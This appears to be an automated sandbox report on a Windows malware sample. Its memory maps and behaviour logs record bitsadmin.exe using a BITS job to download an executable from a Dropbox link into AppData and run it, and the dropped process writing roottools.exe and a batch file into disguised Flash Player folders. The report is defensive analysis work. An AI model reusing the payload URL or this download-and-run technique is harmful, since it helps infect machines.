pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
bitsadmin.exe.mui	0x000e0000	0x000e0fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000110000	0x00110000	0x00110fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000170000	0x00170000	0x001effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000220000	0x00220000	0x0031ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000320000	0x00320000	0x0041ffff	Private Memory	Readable, Writable	Region Actions Download Dump
rpcss.dll	0x00420000	0x0049cfff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x00420000	0x00464fff	Memory Mapped File	Readable	Region Actions
private_0x00000000004a0000	0x004a0000	0x004affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000004b0000	0x004b0000	0x00637fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000640000	0x00640000	0x007c0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007d0000	0x007d0000	0x01bcffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001bd0000	0x01bd0000	0x01e0ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001bd0000	0x01bd0000	0x01caefff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001ce0000	0x01ce0000	0x01d5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001d90000	0x01d90000	0x01e0ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001eb0000	0x01eb0000	0x01f2ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001f50000	0x01f50000	0x01fcffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01fd0000	0x0229efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002300000	0x02300000	0x0237ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000023c0000	0x023c0000	0x0243ffff	Private Memory	Readable, Writable	Region Actions Download Dump
user32.dll	0x76e70000	0x76f69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76f70000	0x7708efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
bitsadmin.exe	0xff2a0000	0xff2f0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
qmgrprxy.dll	0x7fef5020000	0x7fef502efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefb930000	0x7fefb985fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc1a0000	0x7fefc1abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefc5d0000	0x7fefc616fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefc8d0000	0x7fefc8e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefced0000	0x7fefcedefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x7fefcfc0000	0x7fefcfd3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd320000	0x7fefd38afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefd3b0000	0x7fefd48afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7fefd490000	0x7fefd49dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefd4a0000	0x7fefd568fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x7fefd570000	0x7fefe2f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefe300000	0x7fefe32dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefe330000	0x7fefe396fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefe810000	0x7fefea12fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefeb50000	0x7fefebe8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefebf0000	0x7fefecf8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7fefed80000	0x7fefedf0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefef80000	0x7feff01efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff020000	0x7feff03efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7feff090000	0x7feff1bcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7feff1c0000	0x7feff296fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feff3b0000	0x7feff3b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd4fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd5000	0x7fffffd5000	0x7fffffd6fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd7000	0x7fffffd7000	0x7fffffd8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd9000	0x7fffffd9000	0x7fffffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdb000	0x7fffffdb000	0x7fffffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Host Behavior

COM (4)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = UKEF, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_NORMAL	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1, filename = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe	1	Fn

File (152)

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	24	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	18	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	9	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	39	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 6	9	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	8	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 11	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 21	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 23	1	Fn Data

Module (5)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xff2a0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x76f70000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x76f8c4a0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x76f86d40	1	Fn

System (29)

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	13	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	5	Fn
Get Time	type = System Time, time = 2018-01-10 10:49:13 (UTC)	3	Fn
Get Time	type = Ticks, time = 88889	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:51:56 (UTC)	2	Fn
Get Time	type = System Time, time = 2018-01-10 18:52:04 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:52:10 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:52:15 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:52:25 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:52:35 (UTC)	1	Fn

Network Behavior

HTTP Sessions (1)

Information	Value
Total Data Sent	0.36 KB (370 bytes)
Total Data Received	0.00 KB (0 bytes)
Contacted Host Count	1
Contacted Hosts	www.dropbox.com

HTTP Session #1

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	www.dropbox.com
Server Port	443
Data Sent	0.36 KB (370 bytes)
Data Received	0.00 KB (0 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = https, server_name = www.dropbox.com, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe	1	Fn
Send HTTP Request	url = https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1	1	Fn

Process #6: iuoldw.exe

(Host: 1074, Network: 0)

Information	Value
ID	#6
File Name	c:\users\aetadzjz\appdata\roaming\iuoldw.exe
Command Line	C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:16, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:08:57

OS Process Information

Information	Value
PID	0x65c
Parent PID	0xa50 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 8EC 0x 6C4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000210000	0x00210000	0x0021ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000230000	0x00230000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000270000	0x00270000	0x0027ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000280000	0x00280000	0x00281fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000290000	0x00290000	0x00297fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000002a0000	0x002a0000	0x002a0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000002b0000	0x002b0000	0x0032ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0039ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000330000	0x00330000	0x00336fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000330000	0x00330000	0x0035ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000340000	0x00340000	0x00346fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000360000	0x00360000	0x0039ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000003a0000	0x003a0000	0x003dffff	Private Memory	Readable, Writable	Region Actions Download Dump
iuoldw.exe	0x00400000	0x00432fff	Memory Mapped File	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x0041bfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000440000	0x00440000	0x0051efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000550000	0x00550000	0x0064ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000650000	0x00650000	0x007d7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000007e0000	0x007e0000	0x00960fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000970000	0x00970000	0x01d6ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001d70000	0x01d70000	0x01eaffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001d70000	0x01d70000	0x01deffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001df0000	0x01df0000	0x01e8ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001ea0000	0x01ea0000	0x01eaffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001eb0000	0x01eb0000	0x022affff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x022b0000	0x0257efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002580000	0x02580000	0x026fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002580000	0x02580000	0x0266ffff	Private Memory	Readable, Writable	Region Actions Download Dump
rsaenh.dll	0x02580000	0x025bbfff	Memory Mapped File	Readable	Region Actions
private_0x0000000002630000	0x02630000	0x0266ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000026c0000	0x026c0000	0x026fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002700000	0x02700000	0x0286ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002700000	0x02700000	0x027fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002860000	0x02860000	0x0286ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000002870000	0x02870000	0x02c62fff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x02c70000	0x0359ffff	Memory Mapped File	Readable	Region Actions
private_0x00000000035a0000	0x035a0000	0x0b59ffff	Private Memory	Readable, Writable, Executable	Region Actions
msvbvm60.dll	0x72940000	0x72a92fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x74640000	0x74652fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x74660000	0x746dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x746f0000	0x746f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x74700000	0x7475bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74760000	0x7479efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x74850000	0x74870fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74880000	0x748bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x748c0000	0x748d5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x748e0000	0x748e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dhcpcsvc.dll	0x748f0000	0x74901fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x74910000	0x74916fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x74920000	0x7493bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sxs.dll	0x74940000	0x7499efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x74eb0000	0x74eb4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x74ec0000	0x750bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x750c0000	0x750cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75350000	0x75444fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75890000	0x758c4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x758d0000	0x759ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76b10000	0x76b54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76c40000	0x76d75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77240000	0x77245fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Created Files

Filename	File Size	Hash Values	Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	192.00 KB (196608 bytes)	MD5: 71c63dd6822598c7f7c7ab4c9ceb6ba9 SHA1: 854db67ad532a4af63443f8e6f684762e3c9efca SHA256: 99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\updaa5900b0.bat	0.20 KB (200 bytes)	MD5: b1dd1aa15fb939d335f5c39a8ed85ab8 SHA1: 3ea3a7be8ec7b7cce6e9cc1b52c77199858119a6 SHA256: 8ba84a14936373863bb48478a9c13ac8d67e08ff26a4eb5c6bd88237587e6ffd	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\ro4p00rrfog3ie0ev3.ecv	1.73 KB (1776 bytes)	MD5: f3963866cf1b0a9cae95cf0ec6aae77e SHA1: 946fa1fe444c25648522407a7c690ea43e0d3837 SHA256: b4710fc930d2add348793b3160ed9c45b24ee8dcae605ee8ae198c107ef43285	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig	0.70 KB (720 bytes)	MD5: 084cd34da60abfe463f4bcdf6ff6c7c4 SHA1: 376783a4491e556cf55f5b6d3f5ef8edcb6d4faa SHA256: ceddead7e5868e0d0bd135ad23248b1c6562111ccb65bdba7e1cc37314c02712	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin	0.17 KB (171 bytes)	MD5: 1142692290abc4073f6cb4f996e782fa SHA1: d71b914d853ef1017dda3d6a0cbd29127aac5730 SHA256: 6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin	16.74 KB (17146 bytes)	MD5: 18c3f549ae3ef0029f410aa06ca2ad50 SHA1: 2b599a6397db74b8e074dd3a38eb0d2aad8b3be9 SHA256: 4b2dba04ac1ce23a8d5c43f671a55182fdffb5e6a9366d0b019a1dae4afb7d53	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.hin	17.36 KB (17779 bytes)	MD5: 734b4714f249866d6af2cd47b0929a3d SHA1: 323502054d5c3e5294e62377d1626ed6261a4673 SHA256: c36c81a8858e6c68f06d494aa33406ce0c407d672b802f431d273877e507e05f	File Actions Show Properties Download
